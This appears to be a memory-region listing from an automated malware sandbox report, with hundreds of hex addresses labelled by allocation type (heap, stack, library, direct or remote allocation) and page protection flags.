page read and write
3528000
trusted library allocation
page read and write
10000
heap
page read and write
3142000
trusted library allocation
page read and write
27B0000
trusted library allocation
page read and write
29D0000
heap
page read and write
2FB9000
trusted library allocation
page read and write
3481000
trusted library allocation
page read and write
33EA000
trusted library allocation
page read and write
1F4B000
heap
page read and write
39B8000
trusted library allocation
page read and write
2FAA000
trusted library allocation
page read and write
7FF00022000
trusted library allocation
page execute and read and write
1CF6000
heap
page read and write
314D000
trusted library allocation
page read and write
1BE8E000
stack
page read and write
31AE000
trusted library allocation
page read and write
3929000
trusted library allocation
page read and write
2D6000
heap
page read and write
116000
stack
page read and write
2EA000
heap
page read and write
400000
unkown
page readonly
7FF00280000
trusted library allocation
page execute and read and write
73C31000
unkown
page execute read
40A000
unkown
page write copy
2FEF000
trusted library allocation
page read and write
408000
unkown
page readonly
3216000
trusted library allocation
page read and write
7FF00219000
trusted library allocation
page read and write
612000
heap
page read and write
7FF0004A000
trusted library allocation
page execute and read and write
3BBD000
trusted library allocation
page read and write
33B7000
trusted library allocation
page read and write
3440000
heap
page read and write
319A000
trusted library allocation
page read and write
7FF001FC000
trusted library allocation
page read and write
2F97000
trusted library allocation
page read and write
2BE0000
heap
page read and write
408000
unkown
page readonly
2E70000
trusted library allocation
page read and write
381B000
trusted library allocation
page read and write
26D000
stack
page read and write
7FF000EA000
trusted library allocation
page execute and read and write
4F7000
unkown
page readonly
29D8000
heap
page read and write
2E51000
trusted library allocation
page read and write
77D000
heap
page read and write
73C34000
unkown
page readonly
41E000
unkown
page read and write
1BAA0000
trusted library allocation
page read and write
31D6000
trusted library allocation
page read and write
20000
heap
page read and write
7FF00190000
trusted library allocation
page execute and read and write
38C1000
trusted library allocation
page read and write
1FBB000
heap
page read and write
73F000
heap
page read and write
33A0000
heap
page read and write
220000
heap
page read and write
3370000
trusted library allocation
page read and write
12D90000
trusted library allocation
page read and write
2A00000
heap
page read and write
3957000
trusted library allocation
page read and write
38A8000
trusted library allocation
page read and write
7FF00142000
trusted library allocation
page execute and read and write
351F000
trusted library allocation
page read and write
1CD73000
heap
page read and write
3B38000
trusted library allocation
page read and write
2F44000
trusted library allocation
page read and write
2EDC000
trusted library allocation
page read and write
401000
unkown
page execute read
38B4000
trusted library allocation
page read and write
2AB0000
trusted library allocation
page read and write
2FA8000
trusted library allocation
page read and write
3390000
heap
page read and write
73C36000
unkown
page readonly
4F7000
unkown
page readonly
7FF00110000
trusted library allocation
page read and write
37DB000
trusted library allocation
page read and write
37D5000
trusted library allocation
page read and write
30FE000
trusted library allocation
page read and write
1BC60000
heap
page read and write
3994000
trusted library allocation
page read and write
2D4A000
trusted library allocation
page read and write
73BC6000
unkown
page readonly
3C33000
trusted library allocation
page read and write
1CD60000
heap
page read and write
200000
heap
page read and write
3960000
trusted library allocation
page read and write
390C000
trusted library allocation
page read and write
339E000
stack
page read and write
2EB1000
trusted library allocation
page read and write
3735000
trusted library allocation
page read and write
7FF00270000
trusted library allocation
page execute and read and write
40A000
unkown
page write copy
2990000
heap
page read and write
280000
heap
page read and write
7FF0002A000
trusted library allocation
page execute and read and write
6D7000
heap
page read and write
12DD0000
trusted library allocation
page read and write
10000
heap
page read and write
73C21000
unkown
page execute read
3B48000
trusted library allocation
page read and write
1B74D000
stack
page read and write
7FF001D0000
trusted library allocation
page read and write
37A9000
trusted library allocation
page read and write
211000
heap
page read and write
2ED4000
trusted library allocation
page read and write
2EED000
trusted library allocation
page read and write
2E3B000
trusted library allocation
page read and write
2F3B000
trusted library allocation
page read and write
7FF000E2000
trusted library allocation
page execute and read and write
34F9000
trusted library allocation
page read and write
369A000
trusted library allocation
page read and write
39B1000
trusted library allocation
page read and write
1B343000
heap
page read and write
1B2D0000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
186000
heap
page read and write
1B388000
heap
page read and write
2F54000
trusted library allocation
page read and write
4F7000
unkown
page readonly
3150000
trusted library allocation
page read and write
1E20000
heap
page execute and read and write
28B0000
trusted library allocation
page read and write
2F3D000
trusted library allocation
page read and write
1B39E000
heap
page read and write
1BD6000
heap
page read and write
1B48D000
stack
page read and write
7FF00280000
trusted library allocation
page execute and read and write
350F000
trusted library allocation
page read and write
1B3A4000
heap
page read and write
2C7B000
heap
page read and write
399A000
trusted library allocation
page read and write
39C8000
trusted library allocation
page read and write
4970000
direct allocation
page execute and read and write
1BA7A000
trusted library allocation
page read and write
324A000
trusted library allocation
page read and write
3512000
trusted library allocation
page read and write
2F22000
trusted library allocation
page read and write
20B2000
heap
page read and write
12EB5000
trusted library allocation
page read and write
4BB000
unkown
page read and write
30FB000
trusted library allocation
page read and write
1B3CE000
heap
page read and write
7FF0003C000
trusted library allocation
page execute and read and write
1EB0000
trusted library allocation
page read and write
4E6000
heap
page read and write
37C8000
trusted library allocation
page read and write
28B0000
trusted library allocation
page read and write
3B5E000
trusted library allocation
page read and write
1B46000
heap
page read and write
3858000
trusted library allocation
page read and write
3898000
trusted library allocation
page read and write
2DA000
heap
page read and write
367000
heap
page read and write
2810000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
3C68000
trusted library allocation
page read and write
3B77000
trusted library allocation
page read and write
3B33000
trusted library allocation
page read and write
2AB4000
trusted library allocation
page read and write
380000
heap
page read and write
1D04000
heap
page read and write
2810000
trusted library allocation
page read and write
34FF000
trusted library allocation
page read and write
2C7E000
heap
page read and write
7FF00042000
trusted library allocation
page execute and read and write
3900000
trusted library allocation
page read and write
30F000
heap
page read and write
3799000
trusted library allocation
page read and write
20000
heap
page read and write
2A0000
heap
page read and write
2FBA000
trusted library allocation
page read and write
2EE3000
trusted library allocation
page read and write
7FF00032000
trusted library allocation
page execute and read and write
1EB0000
heap
page read and write
5370000
direct allocation
page execute and read and write
4F1000
unkown
page read and write
47D000
unkown
page read and write
697000
heap
page read and write
2EFA000
trusted library allocation
page read and write
2D60000
trusted library allocation
page read and write
32FA000
trusted library allocation
page read and write
2F47000
trusted library allocation
page read and write
3BC9000
trusted library allocation
page read and write
300F000
trusted library allocation
page read and write
401000
unkown
page execute read
12D31000
trusted library allocation
page read and write
36AD000
trusted library allocation
page read and write
2F5F000
trusted library allocation
page read and write
12F41000
trusted library allocation
page read and write
30A8000
trusted library allocation
page read and write
7FF00270000
trusted library allocation
page execute and read and write
7FF00200000
trusted library allocation
page execute and read and write
3910000
trusted library allocation
page read and write
2F9E000
trusted library allocation
page read and write
2F2D000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
2F8E000
trusted library allocation
page read and write
31FF000
trusted library allocation
page read and write
7FF00122000
trusted library allocation
page execute and read and write
1B37C000
heap
page read and write
325A000
trusted library allocation
page read and write
1CC6E000
stack
page read and write
316D000
trusted library allocation
page read and write
2E87000
trusted library allocation
page read and write
3986000
trusted library allocation
page read and write
2B6A000
heap
page execute and read and write
3C6000
heap
page read and write
30DB000
trusted library allocation
page read and write
7FF00030000
trusted library allocation
page read and write
7FF0010C000
trusted library allocation
page execute and read and write
370E000
trusted library allocation
page read and write
410000
unkown
page read and write
392C000
trusted library allocation
page read and write
45B000
unkown
page read and write
3370000
heap
page read and write
3B08000
trusted library allocation
page read and write
397C000
trusted library allocation
page read and write
130000
heap
page read and write
5B0000
heap
page read and write
1B574000
heap
page read and write
300000
heap
page read and write
37DE000
trusted library allocation
page read and write
7FF001F7000
trusted library allocation
page read and write
3B58000
trusted library allocation
page read and write
2F8E000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page execute and read and write
1FD2000
heap
page read and write
1CC0000
heap
page read and write
7FF001A0000
trusted library allocation
page execute and read and write
3518000
trusted library allocation
page read and write
410000
unkown
page read and write
1F00000
trusted library allocation
page read and write
7FF001B0000
trusted library allocation
page read and write
12C01000
trusted library allocation
page read and write
38F0000
trusted library allocation
page read and write
317C000
trusted library allocation
page read and write
3345000
trusted library allocation
page read and write
150000
heap
page read and write
607000
heap
page read and write
7FF00190000
trusted library allocation
page execute and read and write
35A5000
trusted library allocation
page read and write
13100000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
7FF000FA000
trusted library allocation
page execute and read and write
47F000
unkown
page read and write
345B000
trusted library allocation
page read and write
36F4000
trusted library allocation
page read and write
387E000
trusted library allocation
page read and write
12D21000
trusted library allocation
page read and write
3151000
trusted library allocation
page read and write
7FF00190000
trusted library allocation
page read and write
1B3CC000
heap
page read and write
40C000
unkown
page read and write
2FE9000
trusted library allocation
page read and write
35B000
heap
page read and write
3535000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page execute and read and write
30E9000
trusted library allocation
page read and write
602000
heap
page read and write
89000
stack
page read and write
270000
heap
page read and write
35BC000
trusted library allocation
page read and write
1F10000
heap
page read and write
7FF00292000
trusted library allocation
page read and write
2EA2000
trusted library allocation
page read and write
400000
unkown
page readonly
13040000
trusted library allocation
page read and write
1B35A000
heap
page read and write
38A4000
trusted library allocation
page read and write
41E000
unkown
page read and write
38D6000
trusted library allocation
page read and write
2E6D000
trusted library allocation
page read and write
2BA0000
heap
page execute and read and write
35A9000
trusted library allocation
page read and write
3137000
trusted library allocation
page read and write
7FF001FE000
trusted library allocation
page read and write
7FF00227000
trusted library allocation
page read and write
370000
heap
page read and write
7FF001E0000
trusted library allocation
page execute and read and write
33E3000
trusted library allocation
page read and write
2FA4000
trusted library allocation
page read and write
7FF000F0000
trusted library allocation
page read and write
391D000
trusted library allocation
page read and write
352B000
trusted library allocation
page read and write
1C9ED000
stack
page read and write
372000
heap
page read and write
2E80000
trusted library allocation
page read and write
10000
heap
page read and write
3898000
trusted library allocation
page read and write
7FF00110000
trusted library allocation
page read and write
205B000
heap
page read and write
603000
heap
page read and write
37C2000
trusted library allocation
page read and write
37B2000
trusted library allocation
page read and write
180000
heap
page read and write
10000
heap
page read and write
2F27000
trusted library allocation
page read and write
7FF00225000
trusted library allocation
page read and write
7FF00160000
trusted library allocation
page read and write
73BC1000
unkown
page execute read
3515000
trusted library allocation
page read and write
2FFB000
trusted library allocation
page read and write
2EEF000
trusted library allocation
page read and write
3C36000
trusted library allocation
page read and write
318D000
trusted library allocation
page read and write
36FA000
trusted library allocation
page read and write
216000
heap
page read and write
33D0000
trusted library allocation
page read and write
33ED000
trusted library allocation
page read and write
184000
heap
page read and write
353E000
trusted library allocation
page read and write
1BCDE000
stack
page read and write
1F4B000
heap
page read and write
29D4000
heap
page read and write
1AC62000
trusted library allocation
page read and write
5D70000
direct allocation
page execute and read and write
448000
unkown
page read and write
12C2C000
trusted library allocation
page read and write
396C000
trusted library allocation
page read and write
30EB000
trusted library allocation
page read and write
7FF00250000
trusted library allocation
page execute and read and write
392C000
trusted library allocation
page read and write
120000
heap
page read and write
722000
heap
page read and write
2F8A000
trusted library allocation
page read and write
2025000
heap
page read and write
27BA000
heap
page execute and read and write
1C850000
heap
page read and write
3C2F000
trusted library allocation
page read and write
3179000
trusted library allocation
page read and write
3932000
trusted library allocation
page read and write
28B0000
trusted library allocation
page read and write
1C51E000
stack
page read and write
7FF00210000
trusted library allocation
page execute and read and write
7FF001F0000
trusted library allocation
page read and write
2ED8000
trusted library allocation
page read and write
42A000
unkown
page read and write
2FAD000
trusted library allocation
page read and write
38FC000
trusted library allocation
page read and write
2FA7000
trusted library allocation
page read and write
6EE000
stack
page read and write
35EF000
trusted library allocation
page read and write
35A4000
trusted library allocation
page read and write
2B70000
remote allocation
page read and write
352E000
trusted library allocation
page read and write
5D4000
heap
page read and write
34E9000
trusted library allocation
page read and write
1C81E000
stack
page read and write
12EB2000
trusted library allocation
page read and write
B7000
heap
page read and write
30CC000
trusted library allocation
page read and write
388B000
trusted library allocation
page read and write
3942000
trusted library allocation
page read and write
401000
unkown
page execute read
274F000
stack
page read and write
7170000
direct allocation
page execute and read and write
1B10000
heap
page read and write
20D000
heap
page read and write
322E000
trusted library allocation
page read and write
2FB0000
trusted library allocation
page read and write
4A4000
heap
page read and write
2EAF000
stack
page read and write
400000
unkown
page readonly
38B7000
trusted library allocation
page read and write
376000
heap
page read and write
32BF000
trusted library allocation
page read and write
3502000
trusted library allocation
page read and write
3389000
trusted library allocation
page read and write
2BFF000
stack
page read and write
E5000
stack
page read and write | page guard
438000
unkown
page read and write
1F14000
heap
page read and write
10000
heap
page read and write
2F4F000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
323E000
trusted library allocation
page read and write
2E48000
trusted library allocation
page read and write
30E000
heap
page read and write
2C0E000
stack
page read and write | page guard
2750000
trusted library allocation
page read and write
30F1000
trusted library allocation
page read and write
393F000
trusted library allocation
page read and write
2F17000
trusted library allocation
page read and write
1B9F0000
heap
page read and write
408000
unkown
page readonly
4F7000
unkown
page readonly
5D4000
heap
page read and write
3197000
trusted library allocation
page read and write
40A000
unkown
page read and write
329D000
stack
page read and write
23E000
heap
page read and write
34FC000
trusted library allocation
page read and write
1E00000
heap
page execute and read and write
2EDF000
trusted library allocation
page read and write
336C000
trusted library allocation
page read and write
260000
heap
page read and write
3B6A000
trusted library allocation
page read and write
34D3000
trusted library allocation
page read and write
3989000
trusted library allocation
page read and write
1D0000
heap
page read and write
3905000
trusted library allocation
page read and write
38D7000
trusted library allocation
page read and write
376000
heap
page read and write
38BA000
trusted library allocation
page read and write
34EC000
trusted library allocation
page read and write
313A000
trusted library allocation
page read and write
38C7000
trusted library allocation
page read and write
3C5D000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
20BA000
heap
page read and write
2D64000
trusted library allocation
page read and write
73C30000
unkown
page readonly
284D000
stack
page read and write
2E58000
trusted library allocation
page read and write
35C5000
trusted library allocation
page read and write
39BD000
trusted library allocation
page read and write
30BC000
trusted library allocation
page read and write
2F37000
trusted library allocation
page read and write
866000
heap
page read and write
2E6000
heap
page read and write
4BB000
unkown
page read and write
3900000
trusted library allocation
page read and write
36DF000
trusted library allocation
page read and write
1B4DD000
stack
page read and write
3796000
trusted library allocation
page read and write
4B0000
heap
page read and write
296F000
stack
page read and write
1FFE000
stack
page read and write
2B54000
heap
page read and write
350F000
trusted library allocation
page read and write
3120000
trusted library allocation
page read and write
1CB0000
heap
page read and write
3525000
trusted library allocation
page read and write
2BE000
heap
page read and write
2EA000
heap
page read and write
2E7D000
trusted library allocation
page read and write
3457000
trusted library allocation
page read and write
31B7000
trusted library allocation
page read and write
379000
heap
page read and write
3348000
trusted library allocation
page read and write
73C20000
unkown
page readonly
1BE0E000
stack
page read and write
2AD0000
heap
page execute and read and write
3512000
trusted library allocation
page read and write
38D3000
trusted library allocation
page read and write
414000
unkown
page read and write
343E000
stack
page read and write
7FF00050000
trusted library allocation
page read and write
2F76000
trusted library allocation
page read and write
3B64000
trusted library allocation
page read and write
2ECC000
trusted library allocation
page read and write
2CF000
heap
page read and write
89000
stack
page read and write
10000
heap
page read and write
3996000
trusted library allocation
page read and write
2D7000
heap
page read and write
12C3C000
trusted library allocation
page read and write
3538000
trusted library allocation
page read and write
353B000
trusted library allocation
page read and write
296A000
trusted library allocation
page read and write
37BF000
trusted library allocation
page read and write
12C15000
trusted library allocation
page read and write
33C000
heap
page read and write
3855000
trusted library allocation
page read and write
2F0E000
trusted library allocation
page read and write
2AA0000
trusted library allocation
page read and write
12C05000
trusted library allocation
page read and write
400000
unkown
page readonly
2C6F000
trusted library allocation
page read and write
7FF0005C000
trusted library allocation
page execute and read and write
3098000
trusted library allocation
page read and write
3C10000
trusted library allocation
page read and write
3570000
direct allocation
page execute and read and write
2E4B000
trusted library allocation
page read and write
336000
heap
page read and write
2ADA000
heap
page execute and read and write
7FF001D0000
trusted library allocation
page read and write
7FF00210000
trusted library allocation
page read and write
414000
unkown
page read and write
2E4E000
trusted library allocation
page read and write
2EC8000
trusted library allocation
page read and write
29DB000
heap
page read and write
1CD000
heap
page read and write
7FF0004A000
trusted library allocation
page execute and read and write
7FF000F5000
trusted library allocation
page read and write
39AD000
trusted library allocation
page read and write
6D0000
heap
page read and write
400000
unkown
page readonly
1ED2000
heap
page read and write
1DE000
heap
page read and write
2A36000
heap
page read and write
12D81000
trusted library allocation
page read and write
4F7000
unkown
page readonly
4F1000
unkown
page read and write
3B44000
trusted library allocation
page read and write
1FB0000
heap
page read and write
2FCC000
trusted library allocation
page read and write
3472000
trusted library allocation
page read and write
2E61000
trusted library allocation
page read and write
398F000
trusted library allocation
page read and write
380000
heap
page read and write
2F7C000
trusted library allocation
page read and write
2025000
heap
page read and write
40C000
unkown
page read and write
34FF000
trusted library allocation
page read and write
7FF00214000
trusted library allocation
page execute and read and write
31F4000
trusted library allocation
page read and write
398A000
trusted library allocation
page read and write
2E5E000
trusted library allocation
page read and write
7FF00115000
trusted library allocation
page read and write
3133000
trusted library allocation
page read and write
1B391000
heap
page read and write
2EF1000
trusted library allocation
page read and write
2D44000
trusted library allocation
page read and write
2EDD000
trusted library allocation
page read and write
47F000
unkown
page read and write
610000
heap
page read and write
1BA0000
heap
page read and write
12EC2000
trusted library allocation
page read and write
3BAC000
trusted library allocation
page read and write
2F0000
heap
page read and write
3979000
trusted library allocation
page read and write
115000
stack
page read and write | page guard
3742000
trusted library allocation
page read and write
66F000
stack
page read and write
2E51000
trusted library allocation
page read and write
2F94000
trusted library allocation
page read and write
314D000
trusted library allocation
page read and write
322A000
trusted library allocation
page read and write
7FF00217000
trusted library allocation
page read and write
2C11000
trusted library allocation
page read and write
205B000
heap
page read and write
1F5000
heap
page read and write
1FB4000
heap
page read and write
3169000
trusted library allocation
page read and write
2A0000
heap
page read and write
28ED000
stack
page read and write
7FF000E0000
trusted library allocation
page read and write
326C000
trusted library allocation
page read and write
7FF00230000
trusted library allocation
page execute and read and write
3BD2000
trusted library allocation
page read and write
311A000
trusted library allocation
page read and write
2E60000
trusted library allocation
page read and write
30F8000
trusted library allocation
page read and write
31C2000
trusted library allocation
page read and write
3916000
trusted library allocation
page read and write
34F6000
trusted library allocation
page read and write
2B50000
heap
page read and write
28EF000
stack
page read and write
2F32000
trusted library allocation
page read and write
24F000
heap
page read and write
414000
unkown
page read and write
F6000
heap
page read and write
354E000
trusted library allocation
page read and write
438000
unkown
page read and write
2FBC000
trusted library allocation
page read and write
3B74000
trusted library allocation
page read and write
7FF0025B000
trusted library allocation
page execute and read and write
2D54000
heap
page read and write
336E000
stack
page read and write
7FF00142000
trusted library allocation
page execute and read and write
26C000
heap
page read and write
42A000
unkown
page read and write
2EAE000
stack
page read and write | page guard
B3F000
stack
page read and write
3509000
trusted library allocation
page read and write
2CF000
heap
page read and write
2E5B000
trusted library allocation
page read and write
3893000
trusted library allocation
page read and write
35AC000
trusted library allocation
page read and write
1BC3E000
stack
page read and write
7FF0023B000
trusted library allocation
page execute and read and write
300B000
trusted library allocation
page read and write
20A0000
heap
page read and write
3471000
trusted library allocation
page read and write
3101000
trusted library allocation
page read and write
28FD000
trusted library allocation
page read and write
2F6000
heap
page read and write
860000
heap
page read and write
3970000
trusted library allocation
page read and write
13080000
trusted library allocation
page read and write
17F000
heap
page read and write
5B7000
heap
page read and write
37AF000
trusted library allocation
page read and write
3419000
trusted library allocation
page read and write
1B56C000
heap
page read and write
1DDD000
stack
page read and write
3C29000
trusted library allocation
page read and write
3269000
trusted library allocation
page read and write
1F48000
heap
page read and write
392F000
trusted library allocation
page read and write
38B8000
trusted library allocation
page read and write
31A7000
trusted library allocation
page read and write
73C24000
unkown
page readonly
There are 975 hidden memdumps, click here to show them.